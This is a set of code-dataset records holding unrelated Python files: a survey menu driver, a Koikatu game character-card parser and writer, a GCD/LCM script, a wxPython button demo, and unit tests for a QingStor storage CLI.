11-16-2019\n# CSC 217\n# Final Project\n\nfrom ypsurvey import YPSurvey # import YPSurvey class\n\n# create database object using the YPSurvey constructor,\n# which inherits the Survey constructor\np = YPSurvey('YoungPeopleFinal.db')\n\n# This is the program driver and loops through the main menu\n# as long as the user does not choose 3, which exits the loop and ends the program \nchoice = 0\nwhile choice != 3:\n\n #user input\n choice = int(input(\"Main Menu\\n1.Number of people with specific phobias\\n2.Percentage of people with phobia by demographic\\n3.Quit\\n\"))\n \n #list output of phobias associate with total count\n if choice == 1:\n p.phobiaCount()\n\n #list output of phobia percentage by demographic\n if choice == 2: \n p.phobiaDemo()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"644797669","text":"#!/usr/bin/env python\nimport argparse\nimport struct\nimport io\nimport pprint\nimport msgpack\n\nAC_MAP = [\n b'\\x00\\x30',\n b'\\x20\\x41',\n b'\\xA0\\x41',\n b'\\xF4\\x41',\n b'\\x20\\x42',\n b'\\x48\\x42',\n b'\\x70\\x42',\n b'\\x8C\\x42',\n b'\\xA0\\x42',\n b'\\xB4\\x42',\n b'\\xC8\\x42',\n]\n\n\nclass KoikatuCharacter:\n def __init__(self, data, with_card=True, skip_additional=False):\n self.with_card = with_card\n if with_card:\n # read first PNG\n self.card_png = self._read_png(data)\n\n # header\n self.product_no = self._read_int(data)\n self.marker = self._read_utf8_string(data)\n\n # version?\n self.unknown01 = self._read_utf8_string(data)\n\n # second PNG\n self.png_length = self._read_int(data)\n self.png = self._read_png(data)\n\n # list info\n self.list_info_size = self._read_int(data)\n self.list_info_data = data.read(self.list_info_size)\n self.list_info = msgpack.unpackb(self.list_info_data,\n encoding='utf8')\n #print('listinfo:', self.list_info)\n\n # character info\n self.chara_datasize = struct.unpack(\"q\", data.read(8))[0]\n self.chara_data = data.read(self.chara_datasize)\n self.info_order = []\n self.kkex = None\n for info in self.list_info['lstInfo']:\n self.info_order.append(info['name'])\n start = info['pos']\n end = info['pos'] + info['size']\n part = self.chara_data[start:end]\n if info['name'] == 'Custom':\n self._read_custom(part)\n elif info['name'] == 'Coordinate':\n self._read_coordinate(part)\n elif info['name'] == 'Parameter':\n self._read_parameter(part)\n elif info['name'] == 'Status':\n self._read_status(part)\n elif info['name'] == 'KKEx':\n self._read_kkex(part)\n else:\n raise ValueError(f'Unsupported info {info[\"name\"]}')\n\n #print('name:', self.firstname, self.lastname)\n\n self.additional_keys = []\n self.additional = {}\n self.ac = {}\n self.ex_data = b''\n if not with_card:\n # additional info\n len1 = self._read_byte(data)\n if len1 == 4:\n marker = data.read(len1)\n if marker == b'KKEx':\n # bepinex extensible format\n version = self._read_int(data)\n len2 = self._read_int(data)\n ex_data = data.read(len2)\n self.ex_data = b''.join([\n self._pack_byte(len1),\n marker,\n self._pack_int(version),\n self._pack_int(len2),\n ex_data\n ])\n else:\n data.seek(-1, 1)\n\n self.unknown02 = data.read(4)\n self.unknown_mark = data.read(4)\n\n self.dearname = self._read_utf8_string(data)\n #print('dear:', self.dearname)\n\n self.feeling = self._read_int(data)\n self.m_love = self._read_int(data)\n self.h_count = self._read_int(data)\n self.koikatu = self._read_byte(data)\n self.lover = self._read_byte(data)\n self.anger = self._read_byte(data)\n\n self.unknown03 = data.read(1)\n\n self.intelligence = self._read_int(data)\n\n if self.sex == 0:\n self.strength = self._read_int(data)\n self._date = 0\n else:\n self._date = self._read_byte(data)\n data.read(3) # not use\n self.strength = 0\n\n self.ero = self._read_int(data)\n\n if not skip_additional:\n self.unknown06 = data.read(14)\n\n self.ac['mune'] = data.read(4)\n self.ac['kokan'] = data.read(4)\n self.ac['anal'] = data.read(4)\n self.ac['siri'] = data.read(4)\n self.ac['tikubi'] = data.read(4)\n\n self.unknown07 = data.read(14)\n\n self.ac['kokan_piston'] = data.read(4)\n self.ac['anal_piston'] = data.read(4)\n else:\n self.unknown06 = b''\n self.ac['mune'] = b''\n self.ac['kokan'] = b''\n self.ac['anal'] = b''\n self.ac['siri'] = b''\n self.ac['tikubi'] = b''\n self.unknown07 = b''\n self.ac['kokan_piston'] = b''\n self.ac['anal_piston'] = b''\n\n self._read_additional(data)\n\n\n @property\n def firstname(self):\n return self.parameter['firstname']\n\n @firstname.setter\n def firstname(self, value):\n self.parameter['firstname'] = value\n\n @property\n def lastname(self):\n return self.parameter['lastname']\n\n @lastname.setter\n def lastname(self, value):\n self.parameter['lastname'] = value\n\n @property\n def nickname(self):\n return self.parameter['nickname']\n\n @nickname.setter\n def nickname(self, value):\n self.parameter['nickname'] = value\n\n @property\n def sex(self):\n return self.parameter['sex']\n\n @sex.setter\n def sex(self, value):\n self.parameter['sex'] = value\n\n @property\n def answers(self):\n return self.parameter['awnser']\n\n @answers.setter\n def answers(self, value):\n self.parameter['awnser'] = value\n\n @property\n def denials(self):\n return self.parameter['denial']\n\n @denials.setter\n def denials(self, value):\n self.parameter['denial'] = value\n\n @property\n def attributes(self):\n return self.parameter['attribute']\n\n @attributes.setter\n def attributes(self, value):\n self.parameter['attribute'] = value\n\n @property\n def personality(self):\n return self.parameter['personality']\n\n @personality.setter\n def personality(self, value):\n self.parameter['personality'] = value\n\n @property\n def weak_point(self):\n return self.parameter['weakPoint']\n\n @weak_point.setter\n def weak_point(self, value):\n self.parameter['weakPoint'] = value\n\n @property\n def custom(self):\n return (self.face, self.body, self.hair)\n\n @property\n def date(self):\n return self._date\n\n @date.setter\n def date(self, value):\n self._date = value\n\n\n @custom.setter\n def custom(self, value):\n self.face = value[0]\n self.body = value[1]\n self.hair = value[2]\n\n def get_ac(self, key):\n if len(self.ac[key]) > 0:\n v = self._unpack_short(self.ac[key][2:])\n for i, lv in enumerate([self._unpack_short(h) for h in AC_MAP]):\n if v < lv:\n return i - 1 if i > 0 else 0\n return 10\n else:\n return 0\n\n def set_ac(self, key, value):\n if len(self.ac[key]) > 0:\n self.ac[key] = self.ac[key][0:2] + AC_MAP[value]\n\n def _unpack_short(self, bytes_):\n return struct.unpack('H', bytes_)\n\n\n def save(self, out):\n out.write(self._serialize())\n\n def _serialize(self):\n custom_s = self._pack_custom()\n coordinate_s = self._pack_coordinate()\n parameter_s = self._pack_parameter()\n status_s = self._pack_status()\n\n info_data = {\n 'Custom' : custom_s,\n 'Coordinate' : coordinate_s,\n 'Parameter' : parameter_s,\n 'Status' : status_s,\n }\n\n if self.kkex is not None:\n info_data['KKEx'] = self._pack_kkex()\n chara_values = b\"\".join([info_data[key] for key in self.info_order])\n\n pos = 0\n for i, key in enumerate(self.info_order):\n self.list_info[\"lstInfo\"][i][\"pos\"] = pos\n self.list_info[\"lstInfo\"][i][\"size\"] = len(info_data[key])\n pos += len(info_data[key])\n\n list_info_s = msgpack.packb(self.list_info, use_single_float=True, use_bin_type=True)\n\n data = []\n if self.with_card:\n data = [self.card_png]\n\n if self.sex == 0:\n bstr = self._pack_int(self.strength)\n else:\n bstr = self._pack_byte(self._date) + b'\\x00\\x00\\x00'\n\n data += [\n self._pack_int(self.product_no),\n self._pack_utf8_string(self.marker),\n self._pack_utf8_string(self.unknown01),\n self._pack_int(self.png_length),\n self.png,\n self._pack_int(len(list_info_s)),\n list_info_s,\n struct.pack('q', len(chara_values)),\n chara_values,\n self.ex_data,\n self.unknown02,\n self.unknown_mark,\n self._pack_utf8_string(self.dearname),\n self._pack_int(self.feeling),\n self._pack_int(self.m_love),\n self._pack_int(self.h_count),\n self._pack_byte(self.koikatu),\n self._pack_byte(self.lover),\n self._pack_byte(self.anger),\n self.unknown03,\n self._pack_int(self.intelligence),\n bstr,\n self._pack_int(self.ero),\n self.unknown06,\n self.ac['mune'],\n self.ac['kokan'],\n self.ac['anal'],\n self.ac['siri'],\n self.ac['tikubi'],\n self.unknown07,\n self.ac['kokan_piston'],\n self.ac['anal_piston'],\n self._pack_additional()\n ]\n\n return b''.join(data)\n\n\n def _pack_chardata(self):\n return self.chara_data\n\n\n def _read_custom(self, data):\n data_stream = io.BytesIO(data)\n length = self._read_int(data_stream)\n self.face = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n length = self._read_int(data_stream)\n self.body = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n length = self._read_int(data_stream)\n self.hair = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n\n\n def _pack_custom(self):\n face_s = msgpack.packb(self.face, use_single_float=True, use_bin_type=True)\n body_s = msgpack.packb(self.body, use_single_float=True, use_bin_type=True)\n hair_s = msgpack.packb(self.hair, use_single_float=True, use_bin_type=True)\n data = [\n struct.pack(\"i\", len(face_s)),\n face_s,\n struct.pack(\"i\", len(body_s)),\n body_s,\n struct.pack(\"i\", len(hair_s)),\n hair_s\n ]\n return b\"\".join(data)\n\n\n def _read_coordinate(self, data):\n self.coordinates = []\n for coordinate_data in msgpack.unpackb(data):\n coordinate = {}\n data_stream = io.BytesIO(coordinate_data)\n length = self._read_int(data_stream)\n coordinate[\"clothes\"] = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n length = self._read_int(data_stream)\n coordinate[\"accessory\"] = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n makeup = self._read_byte(data_stream)\n coordinate[\"enableMakeup\"] = True if makeup != 0 else False\n length = self._read_int(data_stream)\n coordinate[\"makeup\"] = msgpack.unpackb(data_stream.read(length), encoding='ascii')\n self.coordinates.append(coordinate)\n\n\n def _pack_coordinate(self):\n data = []\n for i in self.coordinates:\n cloth_s = msgpack.packb(i[\"clothes\"], use_single_float=True, use_bin_type=True)\n accessory_s = msgpack.packb(i[\"accessory\"], use_single_float=True, use_bin_type=True)\n makeup_s = msgpack.packb(i[\"makeup\"], use_single_float=True, use_bin_type=True, strict_types=True)\n coordinate = [\n struct.pack(\"i\", len(cloth_s)),\n cloth_s,\n struct.pack(\"i\", len(accessory_s)),\n accessory_s,\n struct.pack(\"b\", 1) if i[\"enableMakeup\"] else struct.pack(\"b\", 0),\n struct.pack(\"i\", len(makeup_s)),\n makeup_s\n ]\n data.append(b\"\".join(coordinate))\n return msgpack.packb(data, use_bin_type=True)\n\n\n def _read_parameter(self, data):\n self.parameter = msgpack.unpackb(data, encoding='utf8')\n\n\n def _pack_parameter(self):\n return msgpack.packb(self.parameter, use_single_float=True, use_bin_type=True)\n\n\n def _read_status(self, data):\n self.status = msgpack.unpackb(data, encoding='utf8')\n\n\n def _pack_status(self):\n return msgpack.packb(self.status, use_single_float=True, use_bin_type=True)\n\n def _read_kkex(self, data):\n self.kkex = msgpack.unpackb(data, encoding='utf8')\n\n def _pack_kkex(self):\n return msgpack.packb(self.kkex, use_single_float=True, use_bin_type=True)\n\n\n def _read_additional(self, data):\n chunk = data.read()\n\n start = chunk.find(b'Idle')\n if start == -1:\n self.before_additional = chunk\n self.ac['houshi'] = b''\n self.after_additional = b''\n return\n\n # -1 is length byte of 'Idle'\n self.before_additional = chunk[0:start-1]\n\n stream = io.BytesIO(chunk[start + len('Idle'):])\n value = self._read_int(stream)\n\n self.additional_keys.append('Idle')\n self.additional['Idle'] = value\n\n while True:\n len_ = self._read_byte(stream)\n if len_ == 0:\n stream.seek(-1, 1)\n break\n key = stream.read(len_).decode('ascii')\n value = self._read_int(stream)\n\n self.additional_keys.append(key)\n self.additional[key] = value\n\n self.ac['houshi'] = stream.read(4)\n self.after_additional = stream.read()\n\n\n def _pack_additional(self):\n data = [self.before_additional]\n\n for key in self.additional_keys:\n data.append(self._pack_byte(len(key)))\n data.append(key.encode())\n data.append(self._pack_int(self.additional[key]))\n\n data.append(self.ac['houshi'])\n data.append(self.after_additional)\n return b''.join(data)\n\n\n def _read_utf8_string(self, data):\n len_ = self._read_byte(data)\n value = data.read(len_)\n return (value.decode('utf8'), len_)\n\n\n def _pack_utf8_string(self, string):\n len_ = self._pack_byte(string[1])\n binary = string[0].encode()\n return len_ + binary\n\n\n def _read_byte(self, data):\n return struct.unpack('b', data.read(1))[0]\n\n\n def _pack_byte(self, size):\n return struct.pack('b', size)\n\n\n def _read_int(self, data, endian='<'):\n return struct.unpack(endian + 'i', data.read(4))[0]\n\n\n def _pack_int(self, size, endian='<'):\n return struct.pack(endian + 'i', size)\n\n\n def _read_png(self, data):\n signature = data.read(8) # PNG file signature\n assert signature == b'\\x89\\x50\\x4e\\x47\\x0d\\x0a\\x1a\\x0a'\n\n ihdr = data.read(25)\n\n # read IDAT chunk\n idat_chunks = []\n len_ = self._read_int(data, '!')\n while len_ > 0:\n idat_type = data.read(4)\n assert idat_type == b'IDAT'\n\n idat_data = data.read(len_)\n idat_crc = data.read(4)\n idat_chunks.append((len_, idat_type, idat_data, idat_crc))\n\n len_ = self._read_int(data, '!')\n\n # read IEND chunk\n iend_len = len_\n iend = data.read(4)\n assert iend == b'IEND'\n\n iend_crc = data.read(4)\n\n data = [signature, ihdr]\n for idat_chunk in idat_chunks:\n data += [\n self._pack_int(idat_chunk[0], '!'),\n idat_chunk[1], idat_chunk[2], idat_chunk[3]\n ]\n data += [self._pack_int(iend_len, '!'), iend, iend_crc]\n\n return b\"\".join(data)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('png_file')\n\n args = parser.parse_args()\n\n with open(args.png_file, 'rb') as infile:\n chara = KoikatuCharacter(infile, True)\n\n pprint.pprint(chara.parameter)\n #pprint.pprint(chara.status)\n #pprint.pprint(chara.additional)\n\n","sub_path":"character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":16307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"435200284","text":"# LCM: Least Common Multiple\n# GCD: Greatest Common Divisor\n\nimport sys\n\ndef gcd(a, b):\n while b != 0:\n a, b = b, a % b\n return a\n\ndef lcd(a, b):\n if a > b:\n a, b = b, a\n ans = a\n while ans % b != 0:\n ans += a\n return ans\n\na, b = map(int, sys.stdin.readline().split())\nprint(gcd(a, b))\nprint(lcd(a, b))","sub_path":"scripts/02609.py","file_name":"02609.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"327167333","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport wx\n\nclass MyFrame(wx.Frame):\n top = 10\n def __init__(self, superior):\n wx.Frame.__init__(self, parent=superior, title=\"Hi\", pos=(100, 200), size=(300,500))\n self.Bind(wx.EVT_LEFT_UP, self.onClick)\n\n def onBtnClick(self, e):\n e.GetEventObject().Hide()\n\n def onClick(self, e):\n b = wx.Button(f, pos=(30,MyFrame.top), label='what', size=(120,20))\n MyFrame.top += b.GetBestSize().GetHeight()\n b.Bind(wx.EVT_LEFT_UP, self.onBtnClick)\n\n\nif __name__ == '__main__' :\n app = wx.App()\n f = MyFrame(None)\n f.Show(True)\n app.MainLoop()\n","sub_path":"wxGUI.py","file_name":"wxGUI.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"463338020","text":"import os\nimport unittest\n\nfrom mock_options import MockOptions\n\nfrom tests.test_data import zone, test_bucket1, test_bucket2\n\nfrom qingstor.qsctl.commands.base import BaseCommand\nfrom qingstor.qsctl.utils import load_conf\n\n\nclass TestBaseCommand(unittest.TestCase):\n Base = BaseCommand\n\n def setUp(self):\n # Set the http connection\n conf = load_conf(\"~/.qingstor/config.yaml\")\n options = MockOptions()\n self.Base.command = \"base\"\n self.Base.client = self.Base.get_client(conf)\n\n self.test_bucket = self.Base.client.Bucket(test_bucket1, zone)\n self.test_bucket.put()\n resp = self.test_bucket.head()\n if resp.status_code != 200:\n self.fail(\"setUp failed: please use another bucket name\")\n self.test_bucket.put_object(\"existskey\")\n\n self.local_path = \"./tmp/tmp.file\"\n\n def test_validate_bucket(self):\n self.Base.validate_bucket(test_bucket1)\n with self.assertRaises(SystemExit):\n self.Base.validate_bucket(test_bucket2)\n\n def test_validate_local_path(self):\n self.Base.validate_local_path(self.local_path)\n dirname = os.path.dirname(self.local_path)\n self.assertTrue(os.path.exists(dirname))\n\n def test_validate_qs_path(self):\n bucket, prefix = self.Base.validate_qs_path(\"qs://\" + test_bucket1 +\n \"/prefix\")\n self.assertEqual(bucket, test_bucket1)\n self.assertEqual(prefix, \"prefix\")\n\n def test_key_exists(self):\n self.assertTrue(self.Base.key_exists(test_bucket1, \"existskey\"))\n self.assertFalse(self.Base.key_exists(test_bucket1, \"noneexistskey\"))\n\n def test_remove_key(self):\n self.Base.remove_key(test_bucket1, \"existskey\")\n\n def test_confirm_key_remove(self):\n options = MockOptions(exclude=\"*\", include=\"*.jpg\")\n self.assertTrue(self.Base.confirm_key_remove(\"test.jpg\", options))\n self.assertFalse(self.Base.confirm_key_remove(\"test.txt\", options))\n\n def test_list_multiple_keys_1(self):\n for i in range(0, 9):\n key = \"prefix\" + \"/\" + str(i)\n self.test_bucket.put_object(key)\n keys, next_marker, dirs = self.Base.list_multiple_keys(\n test_bucket1, prefix=\"prefix\", delimiter=\"/\")\n self.assertEqual(len(keys), 0)\n self.assertEqual(next_marker, \"\")\n self.assertEqual(dirs, ['prefix/'])\n\n def test_list_multiple_keys_2(self):\n marker = \"prefix/5\"\n keys, next_marker, dirs = self.Base.list_multiple_keys(\n test_bucket1, marker=marker, prefix=\"prefix\", limit=1)\n self.assertEqual(len(keys), 1)\n self.assertEqual(next_marker, \"prefix/6\")\n self.assertEqual(dirs, [])\n\n def test_remove_multiple_keys(self):\n options = MockOptions(exclude=None, include=None)\n self.Base.remove_multiple_keys(\n test_bucket1, prefix=\"prefix\", options=options)\n\n def tearDown(self):\n self.test_bucket.delete_object(\"existskey\")\n dirname = os.path.dirname(self.local_path)\n if os.path.exists(dirname):\n os.rmdir(dirname)\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","sub_path":"tests/commands/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}